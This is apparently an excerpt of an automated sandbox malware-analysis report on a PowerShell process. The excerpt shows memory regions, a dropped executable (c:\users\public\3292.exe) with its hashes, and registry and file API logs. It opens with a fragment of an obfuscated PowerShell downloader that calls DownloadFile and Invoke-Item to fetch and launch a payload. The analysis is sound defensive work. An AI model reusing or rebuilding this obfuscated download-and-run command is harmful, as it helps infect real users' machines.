eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) )
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:19, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:02:04

OS Process Information

Information	Value
PID	0xaec
Parent PID	0xad0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AF0 0x AF4 0x B00 0x B04 0x B08 0x B0C 0x B14 0x B18 0x B1C 0x B20 0x B28 0x B3C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000050000	0x00050000	0x000cffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x000d0000	0x00136fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000140000	0x00140000	0x00146fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000150000	0x00150000	0x00151fff	Pagefile Backed Memory	Readable, Writable	Region Actions
powershell.exe.mui	0x00160000	0x00162fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000170000	0x00170000	0x00170fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000180000	0x00180000	0x00180fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000190000	0x00190000	0x00190fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001c0000	0x001c0000	0x001c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	Readable	Region Actions
cversions.2.db	0x001e0000	0x001e3fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db	0x001f0000	0x00214fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000220000	0x00220000	0x0031ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000320000	0x00320000	0x0041ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000420000	0x00420000	0x00420fff	Pagefile Backed Memory	Readable, Writable	Region Actions
cversions.2.db	0x00430000	0x00433fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000440000	0x00440000	0x00440fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000450000	0x00450000	0x0045ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000460000	0x00460000	0x005e7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000005f0000	0x005f0000	0x00770fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000780000	0x00780000	0x01b7ffff	Pagefile Backed Memory	Readable	Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db	0x01b80000	0x01baffff	Memory Mapped File	Readable	Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01bb0000	0x01c15fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001c20000	0x01c20000	0x01c22fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001c30000	0x01c30000	0x01c30fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001c40000	0x01c40000	0x01c4ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001c50000	0x01c50000	0x01c5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001c60000	0x01c60000	0x01d5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001d60000	0x01d60000	0x01e3efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001e40000	0x01e40000	0x01ebffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ec0000	0x01ec0000	0x01f3ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000001f40000	0x01f40000	0x01f5ffff	Private Memory	-	Region Actions Download Dump
l_intl.nls	0x01f60000	0x01f62fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001f70000	0x01f70000	0x01f70fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001f80000	0x01f80000	0x01f8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sorttbls.nlp	0x01f90000	0x01f94fff	Memory Mapped File	Readable	Region Actions
microsoft.wsman.runtime.dll	0x01fa0000	0x01fa7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001fb0000	0x01fb0000	0x01fb0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001fc0000	0x01fc0000	0x0203ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000002040000	0x02040000	0x02040fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002040000	0x02040000	0x02050fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000002070000	0x02070000	0x020effff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x020f0000	0x023befff	Memory Mapped File	Readable	Region Actions
private_0x00000000023d0000	0x023d0000	0x0244ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000002450000	0x02450000	0x024cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000024d0000	0x024d0000	0x028c2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000028d0000	0x028d0000	0x029cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000029d0000	0x029d0000	0x02ad0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002ae0000	0x02ae0000	0x02aeffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002af0000	0x02af0000	0x02afffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002b00000	0x02b00000	0x02b0ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002b10000	0x02b10000	0x02b8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002b90000	0x02b90000	0x1ab8ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000001ab90000	0x1ab90000	0x1b25ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001b260000	0x1b260000	0x1b2dffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.management.automation.dll	0x1b2e0000	0x1b5c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll.mui	0x1b5d0000	0x1b68ffff	Memory Mapped File	Readable, Writable	Region Actions
sortkey.nlp	0x1b690000	0x1b6d0fff	Memory Mapped File	Readable	Region Actions
private_0x000000001b6e0000	0x1b6e0000	0x1b7dffff	Private Memory	Readable, Writable	Region Actions Download Dump
mscorrc.dll	0x1b7e0000	0x1b833fff	Memory Mapped File	Readable	Region Actions
private_0x000000001b840000	0x1b840000	0x1b93ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001bc40000	0x1bc40000	0x1bc4ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001bc50000	0x1bc50000	0x1bc5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001bcf0000	0x1bcf0000	0x1c67ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001c680000	0x1c680000	0x1c7fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001c680000	0x1c680000	0x1c77ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001c780000	0x1c780000	0x1c7fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001c870000	0x1c870000	0x1c8effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001c910000	0x1c910000	0x1c98ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001c9e0000	0x1c9e0000	0x1ca5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001ca70000	0x1ca70000	0x1caeffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001caf0000	0x1caf0000	0x1cceffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.transactions.dll	0x1e230000	0x1e278fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x74b00000	0x74bc8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76e70000	0x76f69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76f70000	0x7708efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77260000	0x77266fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
powershell.exe	0x13f7a0000	0x13f816fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x642ff4a0000	0x642ff4a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.directoryservices.ni.dll	0x7fedf4b0000	0x7fedf644fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.ni.dll	0x7fedf650000	0x7fedf7bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.xml.ni.dll	0x7fedf7c0000	0x7fedfe64fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x7fedfe70000	0x7fedff87fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.utility.ni.dll	0x7fedff90000	0x7fee01a5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x7fee01b0000	0x7fee0294fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x7fee02a0000	0x7fee05cdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x7fee05d0000	0x7fee112cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x7fee1130000	0x7fee11e1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.ni.dll	0x7fee11f0000	0x7fee1c12fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x7fee1c20000	0x7fee2afbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x7fee2b00000	0x7fee349cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x7fee34e0000	0x7fee3589fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x7fee3870000	0x7fee38adfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fee48c0000	0x7fee4958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x7fee4960000	0x7fee49c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef1100000	0x7fef116efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x7fef12c0000	0x7fef12f1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x7fef47a0000	0x7fef47abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x7fef47b0000	0x7fef47e3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x7fef52a0000	0x7fef52a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x7fef5ee0000	0x7fef5f5ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x7fef5f60000	0x7fef5f6efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x7fef7210000	0x7fef7266fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x7fefacd0000	0x7fefacdafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x7fefad00000	0x7fefad18fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x7fefb1b0000	0x7fefb1dcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefb930000	0x7fefb985fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x7fefb990000	0x7fefbabbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7fefbb10000	0x7fefbd03fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc1a0000	0x7fefc1abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x7fefc380000	0x7fefc39dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefc5d0000	0x7fefc616fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefc8d0000	0x7fefc8e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x7fefcdd0000	0x7fefcdf2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefced0000	0x7fefcedefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x7fefcfe0000	0x7fefcfeefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x7fefd2e0000	0x7fefd315fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd320000	0x7fefd38afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x7fefd390000	0x7fefd3a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefd3b0000	0x7fefd48afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7fefd490000	0x7fefd49dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefd4a0000	0x7fefd568fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x7fefd570000	0x7fefe2f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefe300000	0x7fefe32dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefe330000	0x7fefe396fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x7fefe630000	0x7fefe806fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefe810000	0x7fefea12fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefeb50000	0x7fefebe8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefebf0000	0x7fefecf8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7fefed80000	0x7fefedf0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefef80000	0x7feff01efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff020000	0x7feff03efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7feff090000	0x7feff1bcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7feff1c0000	0x7feff296fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x7feff2a0000	0x7feff2f1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff3b0000	0x7feff3b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007ff00020000	0x7ff00020000	0x7ff0002ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00030000	0x7ff00030000	0x7ff0003ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00040000	0x7ff00040000	0x7ff000dffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff000e0000	0x7ff000e0000	0x7ff000effff	Private Memory	-	Region Actions Download Dump
private_0x000007ff000f0000	0x7ff000f0000	0x7ff0015ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00160000	0x7ff00160000	0x7ff0016ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00170000	0x7ff00170000	0x7ff0017ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00180000	0x7ff00180000	0x7ff0018ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00190000	0x7ff00190000	0x7ff0019ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff001a0000	0x7ff001a0000	0x7ff001affff	Private Memory	-	Region Actions Download Dump
private_0x000007ff001b0000	0x7ff001b0000	0x7ff001bffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff001c0000	0x7ff001c0000	0x7ff001cffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff001d0000	0x7ff001d0000	0x7ff001dffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff001e0000	0x7ff001e0000	0x7ff001effff	Private Memory	-	Region Actions Download Dump
private_0x000007ff001f0000	0x7ff001f0000	0x7ff001fffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00200000	0x7ff00200000	0x7ff0020ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00210000	0x7ff00210000	0x7ff0021ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00220000	0x7ff00220000	0x7ff0022ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00230000	0x7ff00230000	0x7ff0023ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00240000	0x7ff00240000	0x7ff0024ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00250000	0x7ff00250000	0x7ff0025ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00260000	0x7ff00260000	0x7ff0026ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00270000	0x7ff00270000	0x7ff0027ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00280000	0x7ff00280000	0x7ff0028ffff	Private Memory	-	Region Actions Download Dump
private_0x000007ff00290000	0x7ff00290000	0x7ff0029ffff	Private Memory	-	Region Actions Download Dump
private_0x000007fffff00000	0x7fffff00000	0x7fffff0ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x000007fffff10000	0x7fffff10000	0x7fffff9ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x000007fffffa4000	0x7fffffa4000	0x7fffffa5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffa6000	0x7fffffa6000	0x7fffffa7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffa8000	0x7fffffa8000	0x7fffffa9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffaa000	0x7fffffaa000	0x7fffffabfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffac000	0x7fffffac000	0x7fffffadfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffae000	0x7fffffae000	0x7fffffaffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd4000	0x7fffffd4000	0x7fffffd4fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd6000	0x7fffffd6000	0x7fffffd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd8000	0x7fffffd8000	0x7fffffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffda000	0x7fffffda000	0x7fffffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 35 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\public\3292.exe	120.00 KB (122880 bytes)	MD5: ca6f2ee0e3b7218da76d126d22f707be SHA1: a7fc89d6b45ce712c0be6600be4a8e6de9de434d SHA256: b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4		File Actions Show Properties Download

Threads

Thread 0xaf0

(Host: 336, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
